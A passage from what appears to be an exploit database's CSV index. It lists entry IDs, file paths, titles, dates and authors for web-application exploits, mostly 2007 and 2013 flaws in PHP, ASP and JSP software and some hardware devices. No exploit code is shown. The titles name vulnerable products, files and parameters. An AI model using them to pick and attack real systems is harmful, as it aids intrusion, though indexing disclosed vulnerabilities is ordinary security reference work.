Jurcenoks",webapps,php, +29482,exploits/php/webapps/29482.php,"WordPress Theme Kernel - Arbitrary File Upload",2013-11-07,link_satisi,webapps,php, +29483,exploits/php/webapps/29483.txt,"Indexu 5.0/5.3 - 'send_pwd.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,webapps,php, +29484,exploits/php/webapps/29484.txt,"Indexu 5.0/5.3 - 'search.php?keyword' Cross-Site Scripting",2007-01-16,SwEET-DeViL,webapps,php, +29485,exploits/php/webapps/29485.txt,"Indexu 5.0/5.3 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,webapps,php, +29486,exploits/php/webapps/29486.txt,"Indexu 5.0/5.3 - 'power_search.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,webapps,php, +29487,exploits/php/webapps/29487.txt,"Indexu 5.0/5.3 - 'new.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,webapps,php, +29488,exploits/php/webapps/29488.txt,"Indexu 5.0/5.3 - 'mailing_list.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,webapps,php, +29489,exploits/php/webapps/29489.txt,"Indexu 5.0/5.3 - 'login.php?Error_msg' Cross-Site Scripting",2007-01-16,SwEET-DeViL,webapps,php, +29491,exploits/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' Cross-Site Scripting",2007-01-17,CorryL,webapps,php, +40368,exploits/cgi/webapps/40368.sh,"Inteno EG101R1 VoIP Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",webapps,cgi,80 +29492,exploits/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' Cross-Site Scripting",2007-01-17,CorryL,webapps,php, +29497,exploits/php/webapps/29497.txt,"Easebay Resources Paypal Subscription - Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,webapps,php, +29498,exploits/php/webapps/29498.txt,"Easebay Resources Login Manager - Multiple Input Validation Vulnerabilities",2007-01-20,Doz,webapps,php, +29499,exploits/php/webapps/29499.txt,"SMF 1.1 - 'index.php' HTML Injection",2007-01-20,"Aria-Security Team",webapps,php, +29500,exploits/asp/webapps/29500.txt,"RASPcalendar 1.01 (ASP) - Admin Login",2013-11-08,"Hackeri-AL UAH-Crew",webapps,asp, +29504,exploits/php/webapps/29504.txt,"Unique Ads - 'Banner.php' SQL Injection",2007-01-22,Linux_Drox,webapps,php, +29505,exploits/php/webapps/29505.txt,"212Cafe Board - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,Linux_Drox,webapps,php, +29506,exploits/php/webapps/29506.txt,"Bitweaver 1.3.1 Articles and Blogs - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,CorryL,webapps,php, +29507,exploits/php/webapps/29507.txt,"212Cafe Guestbook 4.00 - 'show.php' Cross-Site Scripting",2007-01-22,Linux_Drox,webapps,php, +29508,exploits/php/webapps/29508.sh,"Vote! Pro 4.0 - Multiple PHP Code Execution Vulnerabilities",2007-01-23,r0ut3r,webapps,php, +30029,exploits/php/webapps/30029.txt,"SonicBB 1.0 - 'search.php' Cross-Site Scripting",2007-05-14,"Jesper Jurcenoks",webapps,php, +30031,exploits/ios/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,webapps,ios, +30085,exploits/linux/webapps/30085.txt,"Zimbra 2009-2013 - Local File Inclusion",2013-12-06,rubina119,webapps,linux, +30035,exploits/php/webapps/30035.txt,"SonicBB 1.0 - Multiple SQL Injections",2007-05-14,"Jesper Jurcenoks",webapps,php, +30036,exploits/php/webapps/30036.html,"WordPress Plugin Akismet 2.1.3 - Cross-Site Scripting",2007-05-14,"David Kierznowski",webapps,php, +30040,exploits/php/webapps/30040.txt,"Jetbox CMS 2.1 Email - 'FormMail.php' Input Validation",2007-05-15,"Jesper Jurcenoks",webapps,php, +30041,exploits/php/webapps/30041.txt,"Jetbox CMS 2.1 - '/view/search/?path' Cross-Site Scripting",2007-05-15,"Mikhail Markin",webapps,php, +30042,exploits/php/webapps/30042.txt,"Jetbox CMS 2.1 - view/supplynews Multiple Cross-Site Scripting Vulnerabilities",2007-05-15,"Mikhail Markin",webapps,php, +30047,exploits/php/webapps/30047.txt,"vBulletin 3.6.6 - 'calendar.php' HTML Injection",2007-05-16,"laurent gaffie",webapps,php, +30048,exploits/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 - 'ShopContent.asp' Cross-Site Scripting",2007-05-17,"John Martinelli",webapps,asp, +30050,exploits/php/webapps/30050.html,"WordPress Theme Redoable 1.2 - 'header.php?s' Cross-Site Scripting",2007-05-17,"John Martinelli",webapps,php, +30051,exploits/php/webapps/30051.txt,"PsychoStats 2.3 - 'Server.php' Full Path Disclosure",2007-05-17,kefka,webapps,php, +30053,exploits/php/webapps/30053.txt,"ClientExec 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,webapps,php, +30054,exploits/jsp/webapps/30054.txt,"SonicWALL Gms 7.x - Filter Bypass / Persistent",2013-12-05,Vulnerability-Lab,webapps,jsp, +30055,exploits/ios/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,webapps,ios, +30201,exploits/php/webapps/30201.txt,"Fuzzylime 1.0 - 'Low.php' Cross-Site Scripting",2007-06-18,RMx,webapps,php, +30156,exploits/cgi/webapps/30156.txt,"CGILua 3.0 - SQL Injection",2013-12-09,"aceeeeeeeer .",webapps,cgi, +30200,exploits/php/webapps/30200.txt,"PHP Hosting Biller 1.0 - 'index.php' Cross-Site Scripting",2007-08-18,Serapis.net,webapps,php, +30015,exploits/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 - 'Lang' Cookie Local File Inclusion",2007-05-08,netVigilance,webapps,php, +30022,exploits/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 - 'Configure_Plugin.TPL.php' Cross-Site Scripting",2007-05-10,the_Edit0r,webapps,php, +30027,exploits/php/webapps/30027.txt,"CommuniGate Pro 5.1.8 - Web Mail HTML Injection",2007-05-12,"Alla Bezroutchko",webapps,php, +30028,exploits/php/webapps/30028.txt,"EQdkp 1.3.1 - Cross-Site Scripting",2007-05-12,kefka,webapps,php, +29512,exploits/php/webapps/29512.txt,"Vanilla Forums 2.0 < 2.0.18.5 - 'class.utilitycontroller.php' PHP Object Injection",2013-11-08,EgiX,webapps,php,80 +29514,exploits/php/webapps/29514.txt,"appRain 3.0.2 - Blind SQL Injection",2013-11-08,"High-Tech Bridge SA",webapps,php,80 +29515,exploits/php/webapps/29515.pl,"Flatpress 1.0 - Remote Code Execution",2013-11-08,Wireghoul,webapps,php,80 +29516,exploits/hardware/webapps/29516.txt,"Vivotek IP Cameras - RTSP Authentication Bypass",2013-11-08,"Core Security",webapps,hardware, +29517,exploits/php/webapps/29517.txt,"Project'Or RIA 3.4.0 - 'objectDetail.php?objectId' SQL Injection",2013-11-08,"Vicente Aguilera Diaz",webapps,php,80 +29518,exploits/hardware/webapps/29518.txt,"Sagemcom F@st 3184 2.1.11 - Multiple Vulnerabilities",2013-11-08,"Oz Elisyan",webapps,hardware,80 +29519,exploits/php/webapps/29519.txt,"Horde Groupware Web Mail Edition 5.1.2 - Cross-Site Request Forgery (2)",2013-11-08,"Marcela Benetrix",webapps,php,80 +29521,exploits/php/webapps/29521.txt,"Virtual Host Administrator 0.1 - Modules_Dir Remote File Inclusion",2007-01-24,"Dr Max Virus",webapps,php, +29522,exploits/php/webapps/29522.py,"WordPress 1.x/2.0.x - Pingback SourceURI Denial of Service / Information Disclosure",2007-01-24,"Blake Matheny",webapps,php, +29525,exploits/php/webapps/29525.txt,"WordPress Theme Highlight Premium - Cross-Site Request Forgery / Arbitrary File Upload",2013-11-10,DevilScreaM,webapps,php, +29529,exploits/php/webapps/29529.txt,"PHP Membership Manager 1.5 - 'admin.php' Cross-Site Scripting",2007-01-26,Doz,webapps,php, +29530,exploits/php/webapps/29530.txt,"FD Script 1.3.x - 'FName' Information Disclosure",2007-01-26,ajann,webapps,php, +29533,exploits/asp/webapps/29533.html,"AdMentor - Admin Login SQL Injection",2007-01-27,Cr@zy_King,webapps,asp, +29534,exploits/php/webapps/29534.txt,"SpoonLabs Vivvo Article Management CMS 3.40 - 'Show_Webfeed.php' SQL Injection",2007-01-27,St[at]rExT,webapps,php, +29537,exploits/php/webapps/29537.txt,"MDPro 1.0.76 - 'index.php' SQL Injection",2007-01-27,adexior,webapps,php, +29539,exploits/php/webapps/29539.txt,"EncapsCMS 0.3.6 - 'common_foot.php' Remote File Inclusion",2007-01-30,Tr_ZiNDaN,webapps,php, +29677,exploits/php/webapps/29677.txt,"Audins Audiens 3.3 - 'setup.php?PATH_INFO' Cross-Site Scripting",2007-02-26,r00t,webapps,php, +29678,exploits/php/webapps/29678.txt,"Audins Audiens 3.3 - '/system/index.php?Cookie PHPSESSID' SQL Injection",2007-02-26,r00t,webapps,php, +29679,exploits/php/webapps/29679.html,"PHPBB2 - 'Admin_Ug_Auth.php' Administrative Bypass",2007-02-26,"Hasadya Raed",webapps,php, +29680,exploits/php/webapps/29680.html,"SQLiteManager 1.2 - 'main.php' Multiple HTML Injection Vulnerabilities",2007-02-26,"Simon Bonnard",webapps,php, +29681,exploits/php/webapps/29681.txt,"Pagesetter 6.2/6.3.0 - 'index.php' Local File Inclusion",2007-02-26,"D. Matscheko",webapps,php, +29682,exploits/php/webapps/29682.txt,"WordPress 2.1.1 - 'post.php' Cross-Site Scripting",2007-02-26,Samenspender,webapps,php, +29684,exploits/php/webapps/29684.txt,"WordPress 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-02-27,"Stefan Friedli",webapps,php, +29544,exploits/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation",2013-11-12,"Sense of Security",webapps,php, +36816,exploits/php/webapps/36816.php,"Open-Letters - Remote PHP Code Injection",2015-04-22,"TUNISIAN CYBER",webapps,php,80 +29811,exploits/jsp/webapps/29811.txt,"Atlassian JIRA 3.4.2 - IssueNavigator.JSPA Cross-Site Scripting",2007-04-02,syniack,webapps,jsp, +29556,exploits/php/webapps/29556.txt,"OpenEMR 2.8.2 - 'Import_XML.php' Remote File Inclusion",2007-01-31,trzindan,webapps,php, +29557,exploits/php/webapps/29557.txt,"OpenEMR 2.8.2 - 'Login_Frame.php' Cross-Site Scripting",2007-01-31,"Michael Melewski",webapps,php, +29559,exploits/php/webapps/29559.txt,"EasyMoblog 0.5.1 - Multiple Input Validation Vulnerabilities",2007-02-02,"Tal Argoni",webapps,php, +29560,exploits/php/webapps/29560.txt,"PHPProbid 5.24 - 'Lang.php' Remote File Inclusion",2007-02-02,"Hasadya Raed",webapps,php, +29561,exploits/php/webapps/29561.txt,"Uebimiau 2.7.10 - 'index.php' Cross-Site Scripting",2007-02-02,Doz,webapps,php, +29562,exploits/php/webapps/29562.txt,"PortailPHP 2 - '/mod_news/index.php?chemin' Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",webapps,php, +29563,exploits/php/webapps/29563.txt,"PortailPHP 2 - '/mod_news/goodies.php?chemin' Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",webapps,php, +29564,exploits/php/webapps/29564.txt,"PortailPHP 2 - '/mod_news/index.php?chemin' Remote File Inclusion",2007-02-03,"laurent gaffie",webapps,php, +29565,exploits/php/webapps/29565.txt,"PortailPHP 2 - '/mod_news/goodies.php?chemin' Remote File Inclusion",2007-02-03,"laurent gaffie",webapps,php, +29566,exploits/php/webapps/29566.txt,"PortailPHP 2 - '/mod_search/index.php?chemin' Remote File Inclusion",2007-02-03,"laurent gaffie",webapps,php, +29567,exploits/cfm/webapps/29567.txt,"Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting",2007-02-05,digi7al64,webapps,cfm, +29568,exploits/php/webapps/29568.txt,"Coppermine Photo Gallery 1.4.10 - Multiple Local/Remote File Inclusions",2007-02-05,anonymous,webapps,php, +29569,exploits/php/webapps/29569.txt,"MySQLNewsEngine - 'Affichearticles.php3' Remote File Inclusion",2007-02-06,Blaster,webapps,php, +29570,exploits/hardware/webapps/29570.txt,"TOSHIBA e-Studio 232/233/282/283 - Cross-Site Request Forgery (Change Admin Password)",2013-11-13,"Hubert Gradek",webapps,hardware, +29571,exploits/php/webapps/29571.txt,"SYSCP 1.2.15 - System Control Panel CronJob Arbitrary Code Execution",2007-02-07,"Daniel Schulte",webapps,php, +29572,exploits/php/webapps/29572.txt,"cPanel 11 - PassWDMySQL Cross-Site Scripting",2007-02-08,s3rv3r_hack3r,webapps,php, +29574,exploits/php/webapps/29574.php,"eXtreme File Hosting - Arbitrary '.RAR' File Upload",2007-02-09,"hamed bazargani",webapps,php, +29576,exploits/jsp/webapps/29576.txt,"Atlassian JIRA 3.7.3 - BrowseProject.JSPA Cross-Site Scripting",2007-02-09,BL4CK,webapps,jsp, +29578,exploits/php/webapps/29578.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagviewer.php' Multiple Remote File Inclusions",2007-02-12,K-159,webapps,php, +29579,exploits/php/webapps/29579.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tag_process.php' Multiple Remote File Inclusions",2007-02-12,K-159,webapps,php, +29580,exploits/php/webapps/29580.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/CONFIG/errmsg.inc.php?configpath' Remote File Inclusion",2007-02-12,K-159,webapps,php, +29581,exploits/php/webapps/29581.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/addTagmin.php?configpath' Remote File Inclusion",2007-02-12,K-159,webapps,php, +29582,exploits/php/webapps/29582.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/ban_watch.php?configpath' Remote File Inclusion",2007-02-12,K-159,webapps,php, +29583,exploits/php/webapps/29583.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/delTagmin.php?configpath' Remote File Inclusion",2007-02-12,K-159,webapps,php, +29584,exploits/php/webapps/29584.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/delTag.php?configpath' Remote File Inclusion",2007-02-12,K-159,webapps,php, +29585,exploits/php/webapps/29585.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/editTagmin.php?configpath' Remote File Inclusion",2007-02-12,K-159,webapps,php, +29586,exploits/php/webapps/29586.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/editTag.php?configpath' Remote File Inclusion",2007-02-12,K-159,webapps,php, +29587,exploits/php/webapps/29587.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/manageTagmins.php?configpath' Remote File Inclusion",2007-02-12,K-159,webapps,php, +29588,exploits/php/webapps/29588.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/verify.php?configpath' Remote File Inclusion",2007-02-12,K-159,webapps,php, +29589,exploits/php/webapps/29589.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/index.php?adminpath' Remote File Inclusion",2007-02-12,K-159,webapps,php, +29590,exploits/php/webapps/29590.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/readconf.php?Admin' Remote File Inclusion",2007-02-12,K-159,webapps,php, +29591,exploits/php/webapps/29591.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/updateconf.php?Admin' Remote File Inclusion",2007-02-12,K-159,webapps,php, +29592,exploits/php/webapps/29592.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/updatefilter.php?Admin' Remote File Inclusion",2007-02-12,K-159,webapps,php, +29593,exploits/php/webapps/29593.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/wordfilter.php?Admin' Remote File Inclusion",2007-02-12,K-159,webapps,php, +29596,exploits/asp/webapps/29596.txt,"EWay 4 - Default.APSX Cross-Site Scripting",2007-02-12,"BLacK ZeRo",webapps,asp, +29597,exploits/asp/webapps/29597.txt,"Community Server - 'SearchResults.aspx' Cross-Site Scripting",2007-02-12,BL4CK,webapps,asp, +29598,exploits/php/webapps/29598.txt,"WordPress 1.x/2.0.x - 'Templates.php' Cross-Site Scripting",2007-02-12,PsychoGun,webapps,php, +29599,exploits/php/webapps/29599.txt,"TaskFreak! 0.5.5 - 'error.php' Cross-Site Scripting",2007-02-13,Spiked,webapps,php, +29600,exploits/asp/webapps/29600.txt,"Fullaspsite ASP Hosting Site - 'listmain.asp?cat' Cross-Site Scripting",2007-02-13,ShaFuck31,webapps,asp, +29601,exploits/asp/webapps/29601.txt,"Fullaspsite ASP Hosting Site - 'listmain.asp?cat' SQL Injection",2007-02-13,ShaFuck31,webapps,asp, +29602,exploits/php/webapps/29602.txt,"WebTester 5.0.20060927 - 'typeID' SQL Injection",2007-02-14,"Moran Zavdi",webapps,php, +29604,exploits/php/webapps/29604.txt,"ibProArcade 2.5.9+ - 'Arcade.php' SQL Injection",2007-02-15,sp00k,webapps,php, +29605,exploits/php/webapps/29605.txt,"Deskpro 1.1 - 'faq.php' Cross-Site Scripting",2007-02-15,"BLacK ZeRo",webapps,php, +29606,exploits/php/webapps/29606.txt,"Calendar Express - 'search.php' Cross-Site Scripting",2007-02-15,BL4CK,webapps,php, +29676,exploits/php/webapps/29676.txt,"Audins Audiens 3.3 - 'unistall.php' Authentication Bypass",2007-02-26,r00t,webapps,php, +29608,exploits/php/webapps/29608.txt,"CedStat 1.31 - 'index.php?hier' Cross-Site Scripting",2007-02-16,sn0oPy,webapps,php, +29609,exploits/php/webapps/29609.txt,"Meganoide's News 1.1.1 - 'Include.php' Remote File Inclusion",2007-02-16,KaRTaL,webapps,php, +29610,exploits/php/webapps/29610.txt,"Ezboo Webstats 3.03 - Administrative Authentication Bypass",2007-02-16,sn0oPy,webapps,php, +29611,exploits/asp/webapps/29611.txt,"Turuncu Portal 1.0 - 'H_Goster.asp' SQL Injection",2007-02-16,chernobiLe,webapps,asp, +29612,exploits/hardware/webapps/29612.txt,"WBR-3406 Wireless Broadband NAT Router - Web-Console Password Change Bypass / Cross-Site Request Forgery",2013-11-15,"Yakir Wizman",webapps,hardware, +29615,exploits/php/webapps/29615.txt,"Powerschool 4.3.6/5.1.2 - JavaScript File Request Information Disclosure",2007-02-19,gheetotank,webapps,php, +29621,exploits/php/webapps/29621.txt,"AbleDesign MyCalendar 2.20.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-02-20,sn0oPy,webapps,php, +29622,exploits/asp/webapps/29622.txt,"Design4Online - 'Userpages2 Page.asp' SQL Injection",2007-02-20,xoron,webapps,asp, +29623,exploits/cgi/webapps/29623.txt,"Google Desktop - Cross-Site Scripting",2007-02-21,"Yair Amit",webapps,cgi, +29624,exploits/php/webapps/29624.txt,"CedStat 1.31 - 'index.php' Cross-Site Scripting",2007-02-21,sn0oPy,webapps,php, +29625,exploits/php/webapps/29625.txt,"phpTrafficA 1.4.1 - 'plotStat.php?File' Traversal Local File Inclusion",2007-02-21,"Hamid Ebadi",webapps,php, +29626,exploits/php/webapps/29626.txt,"phpTrafficA 1.4.1 - 'banref.php?lang' Traversal Local File Inclusion",2007-02-21,"Hamid Ebadi",webapps,php, +29627,exploits/php/webapps/29627.php,"Magic News Plus 1.0.2 - 'preview.php?PHP_script_path' Remote File Inclusion",2007-02-21,"HACKERS PAL",webapps,php, +29628,exploits/php/webapps/29628.txt,"Magic News Plus 1.0.2 - 'news.php?&link_parameters' Cross-Site Scripting",2007-02-21,"HACKERS PAL",webapps,php, +29629,exploits/php/webapps/29629.txt,"Magic News Plus 1.0.2 - 'n_layouts.php?link_parameters' Cross-Site Scripting",2007-02-21,"HACKERS PAL",webapps,php, +29631,exploits/php/webapps/29631.txt,"Pyrophobia 2.1.3.1 - Cross-Site Scripting",2007-02-22,"laurent gaffie",webapps,php, +29632,exploits/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 - Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",webapps,php, +29633,exploits/ios/webapps/29633.txt,"Google Gmail IOS Mobile Application - Persistent Cross-Site Scripting",2013-11-16,"Ali Raza",webapps,ios, +29634,exploits/php/webapps/29634.txt,"Plantilla - 'list_main_pages.php?nfolder' Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",webapps,php, +29635,exploits/php/webapps/29635.txt,"Pheap 1.x/2.0 - 'edit.php' Directory Traversal",2007-02-22,"laurent gaffie",webapps,php, +29636,exploits/php/webapps/29636.txt,"LoveCMS 1.4 - 'step' Remote File Inclusion",2007-02-22,"laurent gaffie",webapps,php, +29637,exploits/php/webapps/29637.txt,"LoveCMS 1.4 - 'step' Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",webapps,php, +29638,exploits/php/webapps/29638.txt,"LoveCMS 1.4 - 'load' Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",webapps,php, +29639,exploits/php/webapps/29639.txt,"LoveCMS 1.4 - 'id' Cross-Site Scripting",2007-02-22,"laurent gaffie",webapps,php, +29640,exploits/php/webapps/29640.txt,"Shop Kit Plus - 'StyleCSS.php' Local File Inclusion",2007-02-23,"laurent gaffie",webapps,php, +29641,exploits/php/webapps/29641.txt,"XT:Commerce 3.04 - 'index.php' Local File Inclusion",2007-02-23,"laurent gaffie",webapps,php, +29642,exploits/php/webapps/29642.txt,"Simple one-file Gallery - 'gallery.php?f' Traversal Arbitrary File Access",2007-02-23,"laurent gaffie",webapps,php, +29643,exploits/php/webapps/29643.txt,"Simple one-file Gallery - 'gallery.php?f' Cross-Site Scripting",2007-02-23,"laurent gaffie",webapps,php, +29644,exploits/php/webapps/29644.txt,"Pickle 0.3 - 'download.php' Local File Inclusion",2007-02-24,"laurent gaffie",webapps,php, +29645,exploits/php/webapps/29645.txt,"Active Calendar 1.2 - 'showcode.php' Local File Inclusion",2007-02-24,"Simon Bonnard",webapps,php, +29646,exploits/php/webapps/29646.txt,"Active Calendar 1.2 - '/data/flatevents.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",webapps,php, +29647,exploits/php/webapps/29647.txt,"Active Calendar 1.2 - '/data/js.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",webapps,php, +29648,exploits/php/webapps/29648.txt,"Active Calendar 1.2 - '/data/m_2.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",webapps,php, +29649,exploits/php/webapps/29649.txt,"Active Calendar 1.2 - '/data/m_3.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",webapps,php, +29650,exploits/php/webapps/29650.txt,"Active Calendar 1.2 - '/data/m_4.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",webapps,php, +29651,exploits/php/webapps/29651.txt,"Active Calendar 1.2 - '/data/y_2.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",webapps,php, +29652,exploits/php/webapps/29652.txt,"Active Calendar 1.2 - '/data/y_3.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",webapps,php, +29653,exploits/php/webapps/29653.txt,"Active Calendar 1.2 - '/data/mysqlevents.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",webapps,php, +29790,exploits/php/webapps/29790.txt,"ImpressPages CMS 3.8 - Persistent Cross-Site Scripting",2013-11-23,sajith,webapps,php, +29658,exploits/php/webapps/29658.txt,"PhotoStand 1.2 - 'index.php' Cross-Site Scripting",2007-02-24,"Simon Bonnard",webapps,php, +29661,exploits/php/webapps/29661.txt,"Docebo CMS 3.0.x - 'index.php?searchkey' Cross-Site Scripting",2007-02-24,r00t,webapps,php, +29662,exploits/php/webapps/29662.txt,"Docebo CMS 3.0.x - '/modules/htmlframechat/index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-02-24,r00t,webapps,php, +29663,exploits/php/webapps/29663.txt,"SolarPay - 'index.php' Local File Inclusion",2007-02-26,"Hasadya Raed",webapps,php, +29665,exploits/php/webapps/29665.txt,"SQLiteManager 1.2 - Local File Inclusion",2007-02-26,"Simon Bonnard",webapps,php, +29667,exploits/php/webapps/29667.txt,"WordPress Theme Euclid 1.x - Cross-Site Request Forgery",2013-11-18,DevilScreaM,webapps,php,80 +29668,exploits/php/webapps/29668.txt,"WordPress Theme Dimension - Cross-Site Request Forgery",2013-11-18,DevilScreaM,webapps,php,80 +29669,exploits/php/webapps/29669.txt,"WordPress Theme Amplus - Cross-Site Request Forgery",2013-11-18,DevilScreaM,webapps,php,80 +29670,exploits/php/webapps/29670.txt,"WordPress Theme Make A Statement (MaS) - Cross-Site Request Forgery",2013-11-18,DevilScreaM,webapps,php,80 +30367,exploits/php/webapps/30367.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - '/admin/membersearch.php' Multiple Cross-Site Scripting Vulnerabilities",2007-07-23,Lostmon,webapps,php, +30189,exploits/jsp/webapps/30189.txt,"Apache Tomcat 6.0.13 - JSP Example Web Applications Cross-Site Scripting",2007-06-14,anonymous,webapps,jsp, +30190,exploits/php/webapps/30190.txt,"Joomla! Component Letterman Subscriber Module 1.2.4 - 'Mod_Lettermansubscribe.php' Cross-Site Scripting",2007-06-14,"Edi Strosar",webapps,php, +30191,exploits/jsp/webapps/30191.txt,"Apache MyFaces Tomahawk JSF Framework 1.1.5 - 'Autoscroll' Cross-Site Scripting",2007-06-14,"Rajat Swarup",webapps,jsp, +29672,exploits/php/webapps/29672.txt,"LiveZilla 5.0.1.4 - Remote Code Execution",2013-11-18,"Curesec Research Team",webapps,php,80 +29673,exploits/hardware/webapps/29673.txt,"Dahua DVR 2.608.0000.0/2.608.GV00.0 - Authentication Bypass (Metasploit)",2013-11-18,"Jake Reynolds",webapps,hardware,37777 +29674,exploits/jsp/webapps/29674.txt,"ManageEngine DesktopCentral 8.0.0 build < 80293 - Arbitrary File Upload",2013-11-18,Security-Assessment.com,webapps,jsp, +29675,exploits/asp/webapps/29675.txt,"Kaseya < 6.3.0.2 - Arbitrary File Upload",2013-11-18,Security-Assessment.com,webapps,asp, +29789,exploits/php/webapps/29789.txt,"LimeSurvey 2.00+ (build 131107) - Multiple Vulnerabilities",2013-11-23,LiquidWorm,webapps,php, +29694,exploits/php/webapps/29694.txt,"S9Y Serendipity 1.1.1 - 'index.php' SQL Injection",2007-03-01,Samenspender,webapps,php, +29696,exploits/php/webapps/29696.txt,"aWebNews 1.1 - 'listing.php?path_to_news' Remote File Inclusion",2007-03-01,mostafa_ragab,webapps,php, +29697,exploits/php/webapps/29697.txt,"Built2go News Manager 1.0 Blog - 'news.php' Multiple Cross-Site Scripting Vulnerabilities",2007-03-01,the_Edit0r,webapps,php, +29698,exploits/php/webapps/29698.txt,"Built2go News Manager 1.0 Blog - 'rating.php?nid' Cross-Site Scripting",2007-03-01,the_Edit0r,webapps,php, +29700,exploits/php/webapps/29700.txt,"Woltlab Burning Board 2.3.6 - Multiple HTML Injection Vulnerabilities",2007-03-02,Samenspender,webapps,php, +29701,exploits/php/webapps/29701.txt,"WordPress 2.1.1 - Arbitrary Command Execution",2007-03-02,"Ivan Fratric",webapps,php, +29702,exploits/php/webapps/29702.txt,"WordPress 2.1.1 - '/wp-includes/theme.php?iz' Arbitrary Command Execution",2007-03-02,"Ivan Fratric",webapps,php, +29703,exploits/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php?s' SQL Injection",2007-02-26,CorryL,webapps,php, +29704,exploits/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 - 'login.php?PATH_INFO' Cross-Site Scripting",2007-02-26,CorryL,webapps,php, +29705,exploits/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - 'register.php?PATH_INFO' Cross-Site Scripting",2007-02-26,CorryL,webapps,php, +29709,exploits/hardware/webapps/29709.txt,"Ruckus Wireless Zoneflex 2942 Wireless Access Point - Authentication Bypass",2013-11-19,myexploit,webapps,hardware,80 +30368,exploits/php/webapps/30368.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - '/admin/edituser.php?userid' Cross-Site Scripting",2007-07-23,Lostmon,webapps,php, +30369,exploits/php/webapps/30369.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'index.php' Cross-Site Scripting",2007-07-23,Lostmon,webapps,php, +30370,exploits/php/webapps/30370.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'temp.php' Cross-Site Scripting",2007-07-23,Lostmon,webapps,php, +30371,exploits/php/webapps/30371.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'pgmid' SQL Injection",2007-07-23,Lostmon,webapps,php, +29715,exploits/php/webapps/29715.txt,"EPortfolio 1.0 - Client-Side Input Validation",2007-03-05,"Stefan Friedli",webapps,php, +29722,exploits/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 - 'CreateURL.php' Remote File Inclusion",2007-03-09,"Hasadya Raed",webapps,php, +29726,exploits/asp/webapps/29726.pl,"Duyuru Scripti - 'Goster.asp' SQL Injection",2007-03-09,Cr@zy_King,webapps,asp, +29727,exploits/php/webapps/29727.txt,"Premod SubDog 2 - '/includes/functions_kb.php?phpbb_root_path' Remote File Inclusion",2007-03-10,"Hasadya Raed",webapps,php, +29728,exploits/php/webapps/29728.txt,"Premod SubDog 2 - '/includes/themen_portal_mitte.php?phpbb_root_path' Remote File Inclusion",2007-03-10,"Hasadya Raed",webapps,php, +29729,exploits/php/webapps/29729.txt,"Premod SubDog 2 - '/includes/logger_engine.php?phpbb_root_path' Remote File Inclusion",2007-03-10,"Hasadya Raed",webapps,php, +29730,exploits/php/webapps/29730.txt,"SoftNews 4.1/5.5 - '/engine/init.php?root_dir' Remote File Inclusion",2007-03-10,"Hasadya Raed",webapps,php, +29731,exploits/php/webapps/29731.txt,"SoftNews 4.1/5.5 - 